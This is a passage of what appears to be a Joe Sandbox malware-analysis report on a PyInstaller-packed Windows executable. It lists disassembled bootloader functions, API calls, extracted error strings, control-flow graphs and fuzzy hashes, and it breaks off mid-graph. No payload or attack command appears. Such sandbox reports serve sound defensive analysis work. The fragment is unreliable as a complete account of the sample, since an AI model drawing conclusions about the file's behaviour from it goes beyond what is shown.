                                                                                                                                                              • Part of subcall function 00007FF6D6EA8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EA8629
                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6D6E97CB1
                                                                                                                                                              • Part of subcall function 00007FF6D6E92B10: MessageBoxW.USER32 ref: 00007FF6D6E92BE5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                            • Opcode ID: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
                                                                                                                                                            • Instruction ID: a2451216a3412181eddae18d3d37eefbe0d85e24352e1036ce057b5df7ac8e70
                                                                                                                                                            • Opcode Fuzzy Hash: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
                                                                                                                                                            • Instruction Fuzzy Hash: 3951D311F1D25341FE14AB26A9156BE62916F89FC4F484433ED0ECBBD7ED2EE4258740
                                                                                                                                                            Function 00007FF6D6EB6DCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 935 7ff6d6eb6dcc-7ff6d6eb6e01 call 7ff6d6eb64d8 call 7ff6d6eb64e0 call 7ff6d6eb6548 942 7ff6d6eb6f3f-7ff6d6eb6fad call 7ff6d6eab6b8 call 7ff6d6eb23d0 935->942 943 7ff6d6eb6e07-7ff6d6eb6e12 call 7ff6d6eb64e8 935->943 955 7ff6d6eb6faf-7ff6d6eb6fb6 942->955 956 7ff6d6eb6fbb-7ff6d6eb6fbe 942->956 943->942 948 7ff6d6eb6e18-7ff6d6eb6e23 call 7ff6d6eb6518 943->948 948->942 954 7ff6d6eb6e29-7ff6d6eb6e4c call 7ff6d6eab700 GetTimeZoneInformation 948->954 968 7ff6d6eb6f14-7ff6d6eb6f3e call 7ff6d6eb64d0 call 7ff6d6eb64c0 call 7ff6d6eb64c8 954->968 969 7ff6d6eb6e52-7ff6d6eb6e73 954->969 957 7ff6d6eb704b-7ff6d6eb704e 955->957 958 7ff6d6eb6fc0 956->958 959 7ff6d6eb6ff5-7ff6d6eb7008 call 7ff6d6eae3ac 956->959 961 7ff6d6eb6fc3 call 7ff6d6eb6dcc 957->961 962 7ff6d6eb7054-7ff6d6eb705c call 7ff6d6eb6b50 957->962 958->961 975 7ff6d6eb7013-7ff6d6eb702e call 7ff6d6eb23d0 959->975 976 7ff6d6eb700a 959->976 973 7ff6d6eb6fc8-7ff6d6eb6ff4 call 7ff6d6eab700 call 7ff6d6e9c010 961->973 962->973 970 7ff6d6eb6e7e-7ff6d6eb6e85 969->970 971 7ff6d6eb6e75-7ff6d6eb6e7b 969->971 978 7ff6d6eb6e99 970->978 979 7ff6d6eb6e87-7ff6d6eb6e8f 970->979 971->970 989 7ff6d6eb7030-7ff6d6eb7033 975->989 990 7ff6d6eb7035-7ff6d6eb7047 call 7ff6d6eab700 975->990 982 7ff6d6eb700c-7ff6d6eb7011 call 7ff6d6eab700 976->982 987 7ff6d6eb6e9b-7ff6d6eb6f0f call 7ff6d6ebb580 * 4 call 7ff6d6eb39ac call 7ff6d6eb7064 * 2 978->987 979->978 984 7ff6d6eb6e91-7ff6d6eb6e97 979->984 982->958 984->987 987->968 989->982 990->957
                                                                                                                                                            APIs
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6DFA
                                                                                                                                                              • Part of subcall function 00007FF6D6EB6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB655C
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6E0B
                                                                                                                                                              • Part of subcall function 00007FF6D6EB64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB64FC
                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6D6EB6E1C
                                                                                                                                                              • Part of subcall function 00007FF6D6EB6518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB652C
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D6EB705C), ref: 00007FF6D6EB6E43
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                            • API String ID: 2248164782-690618308
                                                                                                                                                            • Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                                                                                                                            • Instruction ID: 2b1855ee9126e6ce828763ed9eafb49e95a8cea8db4fe1c15b79c6345b2bff43
                                                                                                                                                            • Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                                                                                                                            • Instruction Fuzzy Hash: 8B515D32E1C7428AE720DF29E8915AD7760BF88784F444137EA4DC7A96DF3EE4618B40
                                                                                                                                                            Function 00007FF6D6E98D00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                            • Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                                                                                            • Instruction ID: ca9a509348f7e4ed56ee40be18bdca216b8659dcb9615e1354e55280b3b29332
                                                                                                                                                            • Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                                                                                            • Instruction Fuzzy Hash: 57F03122E1C78586EBA08F64A48976E7360AF44B68F440A37D66D466E4DF3DD028DB00
                                                                                                                                                            Function 00007FF6D6E91700 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 7ff6d6e91700-7ff6d6e91714 1 7ff6d6e9172e-7ff6d6e91732 0->1 2 7ff6d6e91716-7ff6d6e9172d call 7ff6d6e92b10 0->2 4 7ff6d6e91734-7ff6d6e9173d call 7ff6d6e912a0 1->4 5 7ff6d6e91758-7ff6d6e9177b call 7ff6d6e97e20 1->5 11 7ff6d6e9174f-7ff6d6e91757 4->11 12 7ff6d6e9173f-7ff6d6e9174a call 7ff6d6e92b10 4->12 13 7ff6d6e917a9-7ff6d6e917c4 call 7ff6d6e94060 5->13 14 7ff6d6e9177d-7ff6d6e917a8 call 7ff6d6e92870 5->14 12->11 20 7ff6d6e917de-7ff6d6e917f1 call 7ff6d6ea1004 13->20 21 7ff6d6e917c6-7ff6d6e917d9 call 7ff6d6e92b10 13->21 27 7ff6d6e91813-7ff6d6e91817 20->27 28 7ff6d6e917f3-7ff6d6e9180e call 7ff6d6e92870 20->28 26 7ff6d6e9191f-7ff6d6e91922 call 7ff6d6ea097c 21->26 35 7ff6d6e91927-7ff6d6e9193e 26->35 31 7ff6d6e91831-7ff6d6e91851 call 7ff6d6ea5780 27->31 32 7ff6d6e91819-7ff6d6e91825 call 7ff6d6e91050 27->32 38 7ff6d6e91917-7ff6d6e9191a call 7ff6d6ea097c 28->38 40 7ff6d6e91872-7ff6d6e91878 31->40 41 7ff6d6e91853-7ff6d6e9186d call 7ff6d6e92870 31->41 39 7ff6d6e9182a-7ff6d6e9182c 32->39 38->26 39->38 44 7ff6d6e9187e-7ff6d6e91887 40->44 45 7ff6d6e91905-7ff6d6e91908 call 7ff6d6ea576c 40->45 49 7ff6d6e9190d-7ff6d6e91912 41->49 48 7ff6d6e91890-7ff6d6e918b2 call 7ff6d6ea0ccc 44->48 45->49 52 7ff6d6e918b4-7ff6d6e918cc call 7ff6d6ea140c 48->52 53 7ff6d6e918e5-7ff6d6e918ec 48->53 49->38 59 7ff6d6e918ce-7ff6d6e918d1 52->59 60 7ff6d6e918d5-7ff6d6e918e3 52->60 54 7ff6d6e918f3-7ff6d6e918fb call 7ff6d6e92870 53->54 61 7ff6d6e91900 54->61 59->48 62 7ff6d6e918d3 59->62 60->54 61->45 62->61
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                            • API String ID: 2030045667-3833288071
                                                                                                                                                            • Opcode ID: ce432d049608e7a4cf79a9e419cc4416eb167f8c11d13a2ab0148bd49c23ab9d
                                                                                                                                                            • Instruction ID: d7079d9effecefaa9733c8c56cff6064a72b092664b0488a3733d4e1f3d58a0b
                                                                                                                                                            • Opcode Fuzzy Hash: ce432d049608e7a4cf79a9e419cc4416eb167f8c11d13a2ab0148bd49c23ab9d
                                                                                                                                                            • Instruction Fuzzy Hash: A451AB61F1C64386EA249B16E4402BD63A1BF49BD8F444033EE4DC76A6EF3EE565D300
                                                                                                                                                            Function 00007FF6D6E91A90 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                            • API String ID: 677216364-1384898525
                                                                                                                                                            • Opcode ID: 32bbf4993e78d2fc4699dd219bcbf087d33e3246068c4f4700ffaa45a66d02fc
                                                                                                                                                            • Instruction ID: 7d12625e96c2034d18debfba716cf8292981bd741a965d3fa6f0980b8a448b2d
                                                                                                                                                            • Opcode Fuzzy Hash: 32bbf4993e78d2fc4699dd219bcbf087d33e3246068c4f4700ffaa45a66d02fc
                                                                                                                                                            • Instruction Fuzzy Hash: 6A516871E0D64286EB28DF28E4901BC77A0EF48B88B518137DA0DC7799DF2EE460CB04
                                                                                                                                                            Function 00007FF6D6E98290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                            • Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                                                                                            • Instruction ID: 9d6a00b2a7435be7504e8c7f1e7a9933d073bff73aa73946bfd63b1fc8206413
                                                                                                                                                            • Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                                                                                            • Instruction Fuzzy Hash: 72410D32E0C78281DA209B64E4552AEB3A4FF94764F500737E6AE87AD5DF7DD064CB40
                                                                                                                                                            Function 00007FF6D6E91050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 511 7ff6d6e91050-7ff6d6e910ab call 7ff6d6e9b840 514 7ff6d6e910d3-7ff6d6e910eb call 7ff6d6ea5780 511->514 515 7ff6d6e910ad-7ff6d6e910d2 call 7ff6d6e92b10 511->515 520 7ff6d6e91109-7ff6d6e91119 call 7ff6d6ea5780 514->520 521 7ff6d6e910ed-7ff6d6e91104 call 7ff6d6e92870 514->521 527 7ff6d6e91137-7ff6d6e91149 520->527 528 7ff6d6e9111b-7ff6d6e91132 call 7ff6d6e92870 520->528 526 7ff6d6e91264-7ff6d6e91279 call 7ff6d6e9b520 call 7ff6d6ea576c * 2 521->526 543 7ff6d6e9127e-7ff6d6e91298 526->543 530 7ff6d6e91150-7ff6d6e91175 call 7ff6d6ea0ccc 527->530 528->526 538 7ff6d6e9117b-7ff6d6e91185 call 7ff6d6ea0a40 530->538 539 7ff6d6e9125c 530->539 538->539 544 7ff6d6e9118b-7ff6d6e91197 538->544 539->526 545 7ff6d6e911a0-7ff6d6e911c8 call 7ff6d6e99c80 544->545 548 7ff6d6e91241-7ff6d6e91257 call 7ff6d6e92b10 545->548 549 7ff6d6e911ca-7ff6d6e911cd 545->549 548->539 550 7ff6d6e911cf-7ff6d6e911d9 549->550 551 7ff6d6e9123c 549->551 553 7ff6d6e91203-7ff6d6e91206 550->553 554 7ff6d6e911db-7ff6d6e911e8 call 7ff6d6ea140c 550->554 551->548 555 7ff6d6e91208-7ff6d6e91216 call 7ff6d6ebaee0 553->555 556 7ff6d6e91219-7ff6d6e9121e 553->556 560 7ff6d6e911ed-7ff6d6e911f0 554->560 555->556 556->545 559 7ff6d6e91220-7ff6d6e91223 556->559 562 7ff6d6e91225-7ff6d6e91228 559->562 563 7ff6d6e91237-7ff6d6e9123a 559->563 564 7ff6d6e911fe-7ff6d6e91201 560->564 565 7ff6d6e911f2-7ff6d6e911fc call 7ff6d6ea0a40 560->565 562->548 566 7ff6d6e9122a-7ff6d6e91232 562->566 563->539 564->548 565->556 565->564 566->530
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                            • Opcode ID: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                                                                                            • Instruction ID: 74ff389bfbf0631f3eef993d53ce9123754a0ba61dab24a1617b9eb4b4915bd5
                                                                                                                                                            • Opcode Fuzzy Hash: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                                                                                            • Instruction Fuzzy Hash: E951AC22E0D68285EA20AB55A4403FE6291BF89B98F444137EE4DC7785EF3EE565D700
                                                                                                                                                            Function 00007FF6D6EAF9C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6D6EAFD5A,?,?,-00000018,00007FF6D6EABB0B,?,?,?,00007FF6D6EABA02,?,?,?,00007FF6D6EA698E), ref: 00007FF6D6EAFB3C
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6D6EAFD5A,?,?,-00000018,00007FF6D6EABB0B,?,?,?,00007FF6D6EABA02,?,?,?,00007FF6D6EA698E), ref: 00007FF6D6EAFB48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction ID: 7c852376e38f4c6e5c220e0c460b338d299afc5bfb453625769a23fd5a74b59b
                                                                                                                                                            • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                                                                                            • Instruction Fuzzy Hash: 8C41BE21F1DB0241FA16CB16A8109B9A6B6BF45B90F094237DD0ED7794EE3EE465C300
                                                                                                                                                            Function 00007FF6D6EAC80C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 822 7ff6d6eac80c-7ff6d6eac832 823 7ff6d6eac834-7ff6d6eac848 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 822->823 824 7ff6d6eac84d-7ff6d6eac851 822->824 838 7ff6d6eacc3e 823->838 825 7ff6d6eacc27-7ff6d6eacc33 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 824->825 826 7ff6d6eac857-7ff6d6eac85e 824->826 845 7ff6d6eacc39 call 7ff6d6eab698 825->845 826->825 828 7ff6d6eac864-7ff6d6eac892 826->828 828->825 832 7ff6d6eac898-7ff6d6eac89f 828->832 835 7ff6d6eac8a1-7ff6d6eac8b3 call 7ff6d6ea5c94 call 7ff6d6ea5cb4 832->835 836 7ff6d6eac8b8-7ff6d6eac8bb 832->836 835->845 841 7ff6d6eac8c1-7ff6d6eac8c7 836->841 842 7ff6d6eacc23-7ff6d6eacc25 836->842 843 7ff6d6eacc41-7ff6d6eacc58 838->843 841->842 846 7ff6d6eac8cd-7ff6d6eac8d0 841->846 842->843 845->838 846->835 849 7ff6d6eac8d2-7ff6d6eac8f7 846->849 851 7ff6d6eac8f9-7ff6d6eac8fb 849->851 852 7ff6d6eac92a-7ff6d6eac931 849->852 853 7ff6d6eac922-7ff6d6eac928 851->853 854 7ff6d6eac8fd-7ff6d6eac904 851->854 855 7ff6d6eac933-7ff6d6eac95b call 7ff6d6eae3ac call 7ff6d6eab700 * 2 852->855 856 7ff6d6eac906-7ff6d6eac91d call 7ff6d6ea5c94 call 7ff6d6ea5cb4 call 7ff6d6eab698 852->856 858 7ff6d6eac9a8-7ff6d6eac9bf 853->858 854->853 854->856 882 7ff6d6eac978-7ff6d6eac9a3 call 7ff6d6ead034 855->882 883 7ff6d6eac95d-7ff6d6eac973 call 7ff6d6ea5cb4 call 7ff6d6ea5c94 855->883 886 7ff6d6eacab0 856->886 861 7ff6d6eac9c1-7ff6d6eac9c9 858->861 862 7ff6d6eaca3a-7ff6d6eaca44 call 7ff6d6eb476c 858->862 861->862 866 7ff6d6eac9cb-7ff6d6eac9cd 861->866 873 7ff6d6eacace 862->873 874 7ff6d6eaca4a-7ff6d6eaca5f 862->874 866->862 870 7ff6d6eac9cf-7ff6d6eac9e5 866->870 870->862 875 7ff6d6eac9e7-7ff6d6eac9f3 870->875 878 7ff6d6eacad3-7ff6d6eacaf3 ReadFile 873->878 874->873 880 7ff6d6eaca61-7ff6d6eaca73 GetConsoleMode 874->880 875->862 881 7ff6d6eac9f5-7ff6d6eac9f7 875->881 884 7ff6d6eacaf9-7ff6d6eacb01 878->884 885 7ff6d6eacbed-7ff6d6eacbf6 GetLastError 878->885 880->873 887 7ff6d6eaca75-7ff6d6eaca7d 880->887 881->862 888 7ff6d6eac9f9-7ff6d6eaca11 881->888 882->858 883->886 884->885 891 7ff6d6eacb07 884->891 894 7ff6d6eacc13-7ff6d6eacc16 885->894 895 7ff6d6eacbf8-7ff6d6eacc0e call 7ff6d6ea5cb4 call 7ff6d6ea5c94 885->895 896 7ff6d6eacab3-7ff6d6eacabd call 7ff6d6eab700 886->896 887->878 893 7ff6d6eaca7f-7ff6d6eacaa1 ReadConsoleW 887->893 888->862 889 7ff6d6eaca13-7ff6d6eaca1f 888->889 889->862 897 7ff6d6eaca21-7ff6d6eaca23 889->897 901 7ff6d6eacb0e-7ff6d6eacb23 891->901 903 7ff6d6eacac2-7ff6d6eacacc 893->903 904 7ff6d6eacaa3 GetLastError 893->904 898 7ff6d6eacaa9-7ff6d6eacaab call 7ff6d6ea5c28 894->898 899 7ff6d6eacc1c-7ff6d6eacc1e 894->899 895->886 896->843 897->862 908 7ff6d6eaca25-7ff6d6eaca35 897->908 898->886 899->896 901->896 910 7ff6d6eacb25-7ff6d6eacb30 901->910 903->901 904->898 908->862 914 7ff6d6eacb32-7ff6d6eacb4b call 7ff6d6eac424 910->914 915 7ff6d6eacb57-7ff6d6eacb5f 910->915 922 7ff6d6eacb50-7ff6d6eacb52 914->922 919 7ff6d6eacb61-7ff6d6eacb73 915->919 920 7ff6d6eacbdb-7ff6d6eacbe8 call 7ff6d6eac264 915->920 923 7ff6d6eacbce-7ff6d6eacbd6 919->923 924 